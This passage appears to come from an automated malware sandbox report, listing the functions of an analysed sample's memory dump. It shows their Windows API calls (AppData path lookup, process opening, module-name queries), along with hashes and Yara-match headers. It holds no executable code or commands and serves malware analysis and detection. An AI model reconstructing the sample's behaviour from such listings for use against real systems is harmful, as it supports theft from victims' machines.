                                 • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: strlen
                                • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                • API String ID: 39653677-4138519520
                                • Opcode ID: 984f2f61aee62bd421f2b2854f3c9e1303d976ffe7db8aec22b12db6bc4cec34
                                • Instruction ID: 9cd6ce351d5159f8c2aa8fae8036f6d0dbfc5210f7352259ff4a18d3748d7b6a
                                • Opcode Fuzzy Hash: 984f2f61aee62bd421f2b2854f3c9e1303d976ffe7db8aec22b12db6bc4cec34
                                • Instruction Fuzzy Hash: 34218E355102898FD722FB35C8547DFF3A7DF80369F85425ACA184BA41E336090AD796
                                APIs
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 003AEBB4
                                • lstrcpy.KERNEL32(00000000,?), ref: 003AEBE3
                                • lstrcat.KERNEL32(?,00000000), ref: 003AEBF1
                                • lstrcat.KERNEL32(?,00F7F430), ref: 003AEC0C
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                 • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FolderPathlstrcpy
                                • String ID:
                                • API String ID: 818526691-0
                                • Opcode ID: 04c82b10dc0d2fc02d74f1859ef8627311e8632b6c13778a0cc913c852097e62
                                • Instruction ID: d2e225385208428da1226ee1b91a698941a32008c27e09fbdcedf7ecf6d3a702
                                • Opcode Fuzzy Hash: 04c82b10dc0d2fc02d74f1859ef8627311e8632b6c13778a0cc913c852097e62
                                • Instruction Fuzzy Hash: 89319572A11519AFCF26EF64DC46FEE73B4FF58300F1104A8BA06AB240DE309E548B94
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,?,00000000,003BA3D0,000000FF), ref: 003B2B8F
                                • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 003B2B96
                                • GetLocalTime.KERNEL32(?,?,00000000,003BA3D0,000000FF), ref: 003B2BA2
                                • wsprintfA.USER32 ref: 003B2BCE
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateLocalProcessTimewsprintf
                                • String ID:
                                • API String ID: 377395780-0
                                • Opcode ID: 7a4e8e18457b98826d93d1cd9c3d996455a1b1719add9d4ac7fc29c8c6775fb5
                                • Instruction ID: ab218757dbacdf8f7a195d36e351499450dfb3ead9e059ef60f57790e523e2b2
                                • Opcode Fuzzy Hash: 7a4e8e18457b98826d93d1cd9c3d996455a1b1719add9d4ac7fc29c8c6775fb5
                                • Instruction Fuzzy Hash: D20140B2904928ABCB149BC9DD49FBFB7BCFB4CB11F00011AF645A2280E7785544D7B5
                                APIs
                                • OpenProcess.KERNEL32(00000410,00000000), ref: 003B4492
                                • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 003B44AD
                                • CloseHandle.KERNEL32(00000000), ref: 003B44B4
                                • lstrcpy.KERNEL32(00000000,?), ref: 003B44E7
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseFileHandleModuleNameOpenProcesslstrcpy
                                • String ID:
                                • API String ID: 4028989146-0
                                • Opcode ID: 2f3ea50ce26ab264f0cfc7de52c457a3b444e0d69d9a8d8f9efd96e3e84c878e
                                • Instruction ID: b5d6e7a26b1215cb1cced5a4d49aa5d772173ad7930d88829af495b8661589b6
                                • Opcode Fuzzy Hash: 2f3ea50ce26ab264f0cfc7de52c457a3b444e0d69d9a8d8f9efd96e3e84c878e
                                • Instruction Fuzzy Hash: EAF0FCB1901A152FE7219B759C4DFEA76A8EF14304F054590FB45D7181DBB08C94C7D4
                                APIs
                                • __getptd.LIBCMT ref: 003B8FDD
                                  • Part of subcall function 003B87FF: __amsg_exit.LIBCMT ref: 003B880F
                                • __getptd.LIBCMT ref: 003B8FF4
                                • __amsg_exit.LIBCMT ref: 003B9002
                                • __updatetlocinfoEx_nolock.LIBCMT ref: 003B9026
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                • String ID:
                                • API String ID: 300741435-0
                                • Opcode ID: 96b75ddca664ff2450f6ba1b20c767ec2cb7fe7d0f804c6fbc7d71987d73cc2c
                                • Instruction ID: 7382ef1b91c1852ed503088fc8d08e427c3d74ca490a947f613a04ebbdf6d5aa
                                • Opcode Fuzzy Hash: 96b75ddca664ff2450f6ba1b20c767ec2cb7fe7d0f804c6fbc7d71987d73cc2c
                                • Instruction Fuzzy Hash: D6F096329086109BD763BB785807BDD33A4AF0071CF254109F744EEDD2DF645940DB55
                                APIs
                                • lstrlen.KERNEL32(------,00395BEB), ref: 003B731B
                                • lstrcpy.KERNEL32(00000000), ref: 003B733F
                                • lstrcat.KERNEL32(?,------), ref: 003B7349
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcatlstrcpylstrlen
                                • String ID: ------
                                • API String ID: 3050337572-882505780
                                • Opcode ID: ffbfe33b99542bcd5adce4a2fb5282e4cd167f21bbc8f942a9d8e689f8494d43
                                • Instruction ID: 9488289cdac4ba77054366cbce53cc747427437eb2843772c1b7ca0718d8041f
                                • Opcode Fuzzy Hash: ffbfe33b99542bcd5adce4a2fb5282e4cd167f21bbc8f942a9d8e689f8494d43
                                • Instruction Fuzzy Hash: 3DF0C978911B029FDB259F35D84C927BAF9EFD4B05319882DA89AC7614EB30D840DB50
                                APIs
                                  • Part of subcall function 00391530: lstrcpy.KERNEL32(00000000,?), ref: 00391557
                                  • Part of subcall function 00391530: lstrcpy.KERNEL32(00000000,?), ref: 00391579
                                  • Part of subcall function 00391530: lstrcpy.KERNEL32(00000000,?), ref: 0039159B
                                  • Part of subcall function 00391530: lstrcpy.KERNEL32(00000000,?), ref: 003915FF
                                • lstrcpy.KERNEL32(00000000,?), ref: 003A3422
                                • lstrcpy.KERNEL32(00000000,?), ref: 003A344B
                                • lstrcpy.KERNEL32(00000000,?), ref: 003A3471
                                • lstrcpy.KERNEL32(00000000,?), ref: 003A3497
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy
                                • String ID:
                                • API String ID: 3722407311-0
                                • Opcode ID: 286358cd93655a3e10d40df424f551a5e2b407f7edc9be95700345855a922953
                                • Instruction ID: 2fc8fbddb68cb4b5a532f3d992dc062a9ae1bf357d0b2dd7cb313882a3584607
                                • Opcode Fuzzy Hash: 286358cd93655a3e10d40df424f551a5e2b407f7edc9be95700345855a922953
                                • Instruction Fuzzy Hash: 1612DC70A016019FDB1ACF19C558B25B7E5EF46718B2EC0ADE809DB3A2D776DD42CB80
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 003A7C94
                                • std::_Xinvalid_argument.LIBCPMT ref: 003A7CAF
                                  • Part of subcall function 003A7D40: std::_Xinvalid_argument.LIBCPMT ref: 003A7D58
                                  • Part of subcall function 003A7D40: std::_Xinvalid_argument.LIBCPMT ref: 003A7D76
                                  • Part of subcall function 003A7D40: std::_Xinvalid_argument.LIBCPMT ref: 003A7D91
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Xinvalid_argumentstd::_
                                • String ID: string too long
                                • API String ID: 909987262-2556327735
                                • Opcode ID: 118cadb98ec080921e30d384bc3f09887b3f0638eb5d1e819c483f8e9f6b2714
                                • Instruction ID: c772498fde6478d29b8ae55ce032d06b285169578a41a920402e4112afdb373f
                                • Opcode Fuzzy Hash: 118cadb98ec080921e30d384bc3f09887b3f0638eb5d1e819c483f8e9f6b2714
                                • Instruction Fuzzy Hash: 5D31C7723086149BD736DE6CECC0A6AF7E9EF92770B214A2AF542CB641D7719C4183E4
                                APIs
                                • GetProcessHeap.KERNEL32(00000008,?), ref: 00396F74
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00396F7B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateProcess
                                • String ID: @
                                • API String ID: 1357844191-2766056989
                                • Opcode ID: 97031cb450b8b588724c16c9e87565742bfd15846a076a6647bf07765a837ef5
                                • Instruction ID: 27cba75de1d7993b1ec15b31a07c00328078e1fa310dc0421f7f70132bfc90cf
                                • Opcode Fuzzy Hash: 97031cb450b8b588724c16c9e87565742bfd15846a076a6647bf07765a837ef5
                                • Instruction Fuzzy Hash: 68218CB16016019BEB218B24DC86BBA73E8EB51704F448878F986CBA84EB79E945C750
                                APIs
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003B244C
                                • lstrlen.KERNEL32(00000000), ref: 003B24E9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003B2570
                                • lstrlen.KERNEL32(00000000), ref: 003B2577
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: 2fb63fa827c1c337578e56a1b0a49fe7c65ad5569ca114d11e5181c8848d2c22
                                • Instruction ID: f008fbc34c3dfcf79511cc891020eed1a8154462e02e428be2c8518c5437d6f7
                                • Opcode Fuzzy Hash: 2fb63fa827c1c337578e56a1b0a49fe7c65ad5569ca114d11e5181c8848d2c22
                                • Instruction Fuzzy Hash: AA81F570E002099FDB25CF95DC44BEFB7B5EF84308F188269E604AB281EB759D46CB90
                                APIs
                                  • Part of subcall function 00391610: lstrcpy.KERNEL32(00000000), ref: 0039162D
                                  • Part of subcall function 00391610: lstrcpy.KERNEL32(00000000,?), ref: 0039164F
                                  • Part of subcall function 00391610: lstrcpy.KERNEL32(00000000,?), ref: 00391671
                                  • Part of subcall function 00391610: lstrcpy.KERNEL32(00000000,?), ref: 00391693
                                • lstrcpy.KERNEL32(00000000,?), ref: 00391557
                                • lstrcpy.KERNEL32(00000000,?), ref: 00391579
                                • lstrcpy.KERNEL32(00000000,?), ref: 0039159B
                                • lstrcpy.KERNEL32(00000000,?), ref: 003915FF
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy
                                • String ID:
                                • API String ID: 3722407311-0
                                • Opcode ID: 73a5790af25f027d40e0401157aa622a4cea4b3bb278c04448db72c3d05fadec
                                • Instruction ID: 01904ea307e1dde8fd86eaecd23b2c0cd12ae68310c2121a6aa96c626e79f25a
                                • Opcode Fuzzy Hash: 73a5790af25f027d40e0401157aa622a4cea4b3bb278c04448db72c3d05fadec
                                • Instruction Fuzzy Hash: CD31B475A11F02AFDB25DF3AC588956BBE5BF89305705492DA896D7B10DB30F811CB80
                                APIs
                                • lstrcpy.KERNEL32(00000000), ref: 003B15A1
                                • lstrcpy.KERNEL32(00000000,?), ref: 003B15D9
                                • lstrcpy.KERNEL32(00000000,?), ref: 003B1611
                                • lstrcpy.KERNEL32(00000000,?), ref: 003B1649
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy
                                • String ID:
                                • API String ID: 3722407311-0
                                • Opcode ID: a886ff0499b175e5f8312ee9ce9a1e2aade1194c56eb71630a9d18168f8a7555
                                • Instruction ID: 0cce8629334bd8ebbe2245fe6109126a56c4822a0a518d3d11f61dcdc6cc7483
                                • Opcode Fuzzy Hash: a886ff0499b175e5f8312ee9ce9a1e2aade1194c56eb71630a9d18168f8a7555
                                • Instruction Fuzzy Hash: 41210874611B029FDB36DF2AD868A17B7F4BF44704B444A1DA886C7A40DB30E811CBA0
                                APIs
                                • lstrcpy.KERNEL32(00000000), ref: 0039162D
                                • lstrcpy.KERNEL32(00000000,?), ref: 0039164F
                                • lstrcpy.KERNEL32(00000000,?), ref: 00391671
                                • lstrcpy.KERNEL32(00000000,?), ref: 00391693
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy
                                • String ID:
                                • API String ID: 3722407311-0
                                • Opcode ID: 2f0e1f7bbf5a16b3085ab9a2ceb63b5698ab9c9fe71fe9a5558e879f9d0777b6
                                • Instruction ID: fdb6a51a1d243eaf8c7cda645cf9610788089fc3f1524fcfc3857a31251a369e
                                • Opcode Fuzzy Hash: 2f0e1f7bbf5a16b3085ab9a2ceb63b5698ab9c9fe71fe9a5558e879f9d0777b6
                                • Instruction Fuzzy Hash: 43111C74E12B03ABDF259F36D40D927B7F8BF44301709052DA896D7A40EB30E811CB90